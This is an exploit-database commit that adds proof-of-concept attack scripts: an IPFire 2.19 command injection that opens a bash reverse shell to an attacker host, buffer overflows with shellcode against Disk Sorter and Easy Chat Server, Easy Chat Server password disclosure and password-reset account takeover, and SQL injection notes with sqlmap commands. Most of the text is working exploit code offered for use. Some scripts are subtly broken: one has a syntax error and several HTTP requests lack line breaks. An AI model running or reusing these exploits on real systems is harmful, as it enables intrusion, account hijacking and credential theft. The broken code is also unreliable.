DB: 2017-06-12

8 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC) Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow VMware vSphere Data Protection 5.x/6.x - Java Deserialization EFS Easy Chat Server 3.1 - Buffer Overflow (SEH) IPFire 2.19 - Remote Code Execution eCom Cart 1.3 - SQL Injection EFS Easy Chat Server 3.1 - Password Disclosure EFS Easy Chat Server 3.1 - Password Reset PaulShop - SQL Injection
2017-06-12 05:01:24 +00:00 · 2017-06-12 05:01:24 +00:00 · dea52f68f5
commit dea52f68f5
parent fbe517f675
9 changed files with 424 additions and 1 deletions
--- a/files.csv
+++ b/files.csv
@ -5526,7 +5526,7 @@ id,file,description,date,author,platform,type,port
 42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0
 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
-42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
+42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos,0
 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
@ -9044,6 +9044,7 @@ id,file,description,date,author,platform,type,port
 42142,platforms/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local,0
 42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
 42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
+42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15583,6 +15584,8 @@ id,file,description,date,author,platform,type,port
 42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
 42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
+42152,platforms/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote,0
+42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37978,3 +37981,8 @@ id,file,description,date,author,platform,type,port
 42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0
 42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
 42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0
+42149,platforms/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps,0
+42151,platforms/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps,0
+42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
+42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
+42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0
--- a/platforms/linux/webapps/42149.py
+++ b/platforms/linux/webapps/42149.py
@ -0,0 +1,45 @@
+# 
+# Title :  IPFire 2.19 Firewall Post-Auth RCE
+# Date : 09/06/2017
+# Author : 0x09AL (https://twitter.com/0x09AL)
+# Tested on: IPFire 2.19 (x86_64) - Core Update 110
+# Vendor : http://www.ipfire.org/
+# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso
+# Vulnerability Description:
+# The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget.
+# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF.
+# 
+#
+
+import requests
+
+
+# Adjust the ip and ports. 
+
+revhost = '192.168.56.1'
+revport = 1337
+url = 'https://192.168.56.102:444/cgi-bin/ids.cgi'
+username = 'admin'
+password = 'admin'
+
+
+payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1'
+evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'}
+headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'}
+
+
+def verifyVuln():
+	req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed.
+	if(req.status_code == 200 and "uid=99(nobody)" in req.text):
+		print "[+] IPFire Installation is Vulnerable [+]"
+		revShell()
+	else:
+		print "[+] Not Vulnerable [+]"
+
+def revShell():
+	evildata["OINKCODE"] = '`' + payload + '`'
+	print "[+] Sending Malicious Payload [+]"
+	req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False)
+
+	
+verifyVuln()
--- a/platforms/multiple/remote/42152.py
+++ b/platforms/multiple/remote/42152.py
--- a/platforms/php/webapps/42151.txt
+++ b/platforms/php/webapps/42151.txt
@ -0,0 +1,28 @@
+# Exploit Title: eCom Cart 1.3 Exploit
+# Google Dork: inurl:"/pdetails/11" ([11] is variable)
+# Date: 10.06.2017
+# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci
+# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
+# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007
+# Version: 1.3
+# Tested on: Linux
+
+
+
+$ curl http://localhost/ecom-cart/charge.php -d order_id=%271
+
+Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access
+violation: 1064 You have an error in your SQL syntax; check the manual
+that corresponds to your MariaDB server version for the right syntax
+to use near '1'' at line 1 in
+/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16
+Stack trace:
+#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16):
+PDO->query('SELECT * FROM 3...')
+#1 {main}
+  thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php
+on line 16
+
+$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs
+
+
--- a/platforms/php/webapps/42156.txt
+++ b/platforms/php/webapps/42156.txt
@ -0,0 +1,14 @@
+# Exploit Title: [PaulShop CMS <= 2017-03-25 Sql Injection]
+# Date: [10-06-2017]
+# Exploit Author: [Se0pHpHack3r]
+# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714]
+# Version: [2017-03-25] 
+
+1. Description
+
+SQL Injection on Shipping Cost page in Cart, with "country" & "weight" parameter (GET)
+
+2. Examples
+
+http://localhost/shop/en/cart/shipping_cost?country=[SQL INJECTION HERE]
+http://localhost/shop/en/cart/shipping_cost?country=TH&weight=[SQL INJECTION HERE]
--- a/platforms/windows/local/42157.py
+++ b/platforms/windows/local/42157.py
@ -0,0 +1,87 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow
+# Date: 10-06-2017
+# Exploit Author: abatchy17 -- @abatchy17
+# Vulnerable Software: DiskSorter v9.7.14
+# Vendor Homepage:    http://www.disksorter.com/    
+# Version: 9.7.14
+# Software Link:      http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe
+# Tested On: Windows XP SP3
+#
+# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box
+#
+# Credit to n3ckD_ for discovering the DoS exploit
+#
+# Challenges to convert this DoS to code execution:
+#   1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish)
+#   2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c
+#   3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory
+#
+#               +----------------------------------+
+#               |1 custom shellcode == 1 dead llama|
+#               +----------------------------------+
+#
+##############################################################################
+
+a = open("exploit.txt", "w")
+
+# Message=  0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
+
+badchars = "\x0a\x0d\x2f"
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
+buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
+buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
+buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
+buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
+buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
+buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
+
+jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad!
+
+llamaleftovers = (
+    "\x55"  # push EBP
+    "\x58"  # pop EAX
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x55\x55\x55\x55"  # add EAX, 0x55555555
+    "\x05\x56\x56\x55\x55"  # add EAX, 0x55555656 -> EAX = EBP + 209
+    "\x40"  # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
+    )
+
+junk = "\x55" + + "\x53\x5b" * 105
+
+data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
+
+a.write(data)
+a.close()
--- a/platforms/windows/remote/42155.py
+++ b/platforms/windows/remote/42155.py
@ -0,0 +1,106 @@
+# Exploit Title: Easy Chat Server User Registeration Buffer Overflow (SEH)
+# Date: 09/10/2017
+# Software Link: http://echatserver.com/ecssetup.exe
+# Exploit Author: Aitezaz Mohsin
+# Vulnerable Version: v2.0 to v3.1
+# Vulnerability Type: Buffer Overflow
+# Severity: Critical
+# Tested on: [Windows XP Sp3 Eng]
+
+
+# ======================================================================================================================
+#	Username parameter in Registeration page 'register.ghp' is prone to a stack-based buffer-overflow vulnerability.
+# Application fails to properly bounds-check user-supplied data before copying it into an insufficiently sized buffer. 
+# ======================================================================================================================
+
+# USAGE: python exploit.py ip
+
+#!/usr/bin/python
+
+import os
+import sys
+import socket
+
+ip = sys.argv[1]
+
+socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
+
+socket.connect((ip , 80))
+
+#AlphanumericShellcode
+
+shellcode = ("\x89\xe2\xda\xde\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x43\x43"
+"\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41"
+"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
+"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
+"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4b\x32\x55\x50\x33"
+"\x30\x35\x50\x43\x50\x4d\x59\x5a\x45\x36\x51\x4f\x30\x32\x44"
+"\x4c\x4b\x30\x50\x50\x30\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x30"
+"\x52\x44\x54\x4c\x4b\x44\x32\x36\x48\x34\x4f\x58\x37\x50\x4a"
+"\x31\x36\x36\x51\x4b\x4f\x4e\x4c\x47\x4c\x43\x51\x33\x4c\x43"
+"\x32\x46\x4c\x51\x30\x39\x51\x48\x4f\x34\x4d\x45\x51\x48\x47"
+"\x4d\x32\x4c\x32\x50\x52\x56\x37\x4c\x4b\x31\x42\x42\x30\x4c"
+"\x4b\x31\x5a\x47\x4c\x4c\x4b\x30\x4c\x54\x51\x42\x58\x4a\x43"
+"\x47\x38\x35\x51\x48\x51\x36\x31\x4c\x4b\x46\x39\x37\x50\x55"
+"\x51\x49\x43\x4c\x4b\x50\x49\x35\x48\x4b\x53\x57\x4a\x37\x39"
+"\x4c\x4b\x50\x34\x4c\x4b\x53\x31\x38\x56\x56\x51\x4b\x4f\x4e"
+"\x4c\x49\x51\x38\x4f\x44\x4d\x53\x31\x39\x57\x37\x48\x4b\x50"
+"\x32\x55\x4a\x56\x43\x33\x43\x4d\x4c\x38\x57\x4b\x43\x4d\x31"
+"\x34\x43\x45\x5a\x44\x46\x38\x4c\x4b\x31\x48\x51\x34\x33\x31"
+"\x58\x53\x42\x46\x4c\x4b\x44\x4c\x30\x4b\x4c\x4b\x46\x38\x35"
+"\x4c\x35\x51\x4e\x33\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x4e\x30"
+"\x4d\x59\x30\x44\x31\x34\x37\x54\x31\x4b\x51\x4b\x53\x51\x31"
+"\x49\x50\x5a\x56\x31\x4b\x4f\x4d\x30\x51\x4f\x51\x4f\x50\x5a"
+"\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x51\x4d\x55\x38\x46\x53\x36"
+"\x52\x35\x50\x55\x50\x45\x38\x32\x57\x32\x53\x30\x32\x51\x4f"
+"\x56\x34\x33\x58\x30\x4c\x32\x57\x56\x46\x44\x47\x4b\x4f\x58"
+"\x55\x4f\x48\x4c\x50\x35\x51\x43\x30\x43\x30\x37\x59\x4f\x34"
+"\x50\x54\x50\x50\x32\x48\x37\x59\x4b\x30\x32\x4b\x55\x50\x4b"
+"\x4f\x59\x45\x53\x5a\x33\x38\x50\x59\x50\x50\x5a\x42\x4b\x4d"
+"\x51\x50\x36\x30\x31\x50\x36\x30\x45\x38\x4b\x5a\x54\x4f\x39"
+"\x4f\x4b\x50\x4b\x4f\x38\x55\x4c\x57\x52\x48\x53\x32\x45\x50"
+"\x44\x51\x31\x4c\x4b\x39\x4b\x56\x52\x4a\x52\x30\x50\x56\x56"
+"\x37\x33\x58\x58\x42\x39\x4b\x46\x57\x55\x37\x4b\x4f\x39\x45"
+"\x51\x47\x43\x58\x4f\x47\x4b\x59\x30\x38\x4b\x4f\x4b\x4f\x59"
+"\x45\x51\x47\x42\x48\x54\x34\x5a\x4c\x57\x4b\x4b\x51\x4b\x4f"
+"\x48\x55\x30\x57\x5a\x37\x42\x48\x32\x55\x52\x4e\x30\x4d\x45"
+"\x31\x4b\x4f\x38\x55\x35\x38\x35\x33\x52\x4d\x45\x34\x45\x50"
+"\x4b\x39\x4d\x33\x56\x37\x31\x47\x56\x37\x46\x51\x5a\x56\x32"
+"\x4a\x44\x52\x56\x39\x31\x46\x5a\x42\x4b\x4d\x53\x56\x39\x57"
+"\x30\x44\x51\x34\x57\x4c\x35\x51\x33\x31\x4c\x4d\x37\x34\x57"
+"\x54\x32\x30\x58\x46\x35\x50\x51\x54\x50\x54\x30\x50\x31\x46"
+"\x51\x46\x36\x36\x31\x56\x36\x36\x30\x4e\x36\x36\x51\x46\x31"
+"\x43\x46\x36\x43\x58\x33\x49\x48\x4c\x47\x4f\x4b\x36\x4b\x4f"
+"\x58\x55\x4c\x49\x4d\x30\x30\x4e\x36\x36\x47\x36\x4b\x4f\x56"
+"\x50\x32\x48\x33\x38\x4c\x47\x35\x4d\x35\x30\x4b\x4f\x49\x45"
+"\x4f\x4b\x4a\x50\x48\x35\x59\x32\x50\x56\x52\x48\x4f\x56\x5a"
+"\x35\x4f\x4d\x4d\x4d\x4b\x4f\x58\x55\x37\x4c\x53\x36\x33\x4c"
+"\x44\x4a\x4b\x30\x4b\x4b\x4d\x30\x33\x45\x45\x55\x4f\x4b\x37"
+"\x37\x34\x53\x52\x52\x32\x4f\x53\x5a\x35\x50\x36\x33\x4b\x4f"
+"\x4e\x35\x41\x41")     
+
+magic = "B" * 217
+magic += "\xeb\x06\x90\x90"
+magic += "\xBC\x04\x01\x10"
+magic += shellcode
+
+magic += "C" * 200
+ 
+
+buffer = "POST /registresult.htm HTTP/1.1\r\n\r\n"
+buffer += "Host: 192.168.1.11"
+buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
+buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+buffer += "Accept-Language: en-US,en;q=0.5"
+buffer += "Accept-Encoding: gzip, deflate"
+buffer += "Referer: http://192.168.1.11/register.ghp"
+buffer += "Connection: close"
+buffer += "Content-Type: application/x-www-form-urlencoded"
+
+buffer += "UserName=" + magic +"&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
+
+socket.send(buffer)
+
+data = socket.recv(4096)
+print data
+socket.close()
--- a/platforms/windows/webapps/42153.py
+++ b/platforms/windows/webapps/42153.py
@ -0,0 +1,40 @@
+# Exploit Title: Easy Chat Server Remote Password Disclosure
+# Date: 09/10/2017
+# Software Link: http://echatserver.com/ecssetup.exe
+# Exploit Author: Aitezaz Mohsin
+# Vulnerable Version: v2.0 to v3.1
+# Vulnerability Type: Pre-Auth Remote Password Disclosure
+# Severity: Critical
+
+# =========================================================================================================
+#	Registeration page 'register.ghp' allows disclosing ANY user's password.
+# Remote un-authenticated attackers can send HTTP GET requests to obtain ANY Easy Chat Server user password.
+# =========================================================================================================
+
+# USAGE: python exploit.py ip username
+
+#!/usr/bin/python
+
+import urllib
+import re
+import requests
+import sys
+
+ip = sys.argv[1]
+username = sys.argv[2]
+
+url = 'http://' + ip + '/register.ghp?username=' + username + '&password='
+response = requests.get(url)
+html = response.content
+
+pattern = '<INPUT type="password" name="Password" maxlength="30"  value="(.+?)">'
+result = re.compile(pattern)
+
+password = re.findall(result,html)
+
+x = ''.join(password)
+
+password = x.replace("[", "")
+password = x.replace("]", "")
+
+print "Password: " + password
--- a/platforms/windows/webapps/42154.py
+++ b/platforms/windows/webapps/42154.py
@ -0,0 +1,45 @@
+# Exploit Title: Easy Chat Server Remote Password Reset
+# Date: 09/10/2017
+# Software Link: http://echatserver.com/ecssetup.exe
+# Exploit Author: Aitezaz Mohsin
+# Vulnerable Version: v2.0 to v3.1
+# Vulnerability Type: Pre-Auth Remote Password Reset
+# Severity: Critical
+
+# ====================================================================================================
+#	Registeration page 'register.ghp' allows resetting ANY user's password.
+# Remote un-authenticated attackers can send HTTP POST requests to Hijack ANY Easy Chat Server account.
+# ====================================================================================================
+
+# USAGE: python exploit.py ip port username password
+
+#!/usr/bin/python
+
+import os,sys,socket
+
+ip = sys.argv[1]
+username = sys.argv[2]
+password = sys.argv[3] 
+
+socket = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
+
+socket.connect((ip , 80))
+
+
+buffer = "POST /registresult.htm HTTP/1.1"
+buffer += "Host: 192.168.1.11"
+buffer += "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0"
+buffer += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"
+buffer += "Accept-Language: en-US,en;q=0.5"
+buffer += "Accept-Encoding: gzip, deflate"
+buffer += "Connection: close"
+buffer += "Content-Type: application/x-www-form-urlencoded"
+ 
+buffer += "UserName=" + username + "&Password=" + password  + "&Password1=ggg&Sex=0&Email=%25252540&Icon=image17.gif&Resume=aaa&cw=0&RoomID=%3C%21--%24RoomID--%3E&RepUserName=%3C%21--%24UserName--%3E&submit1=Change"
+ 
+socket.send(buffer)
+
+socket.close()
+
+print "[#] Password Changed Successfully"
+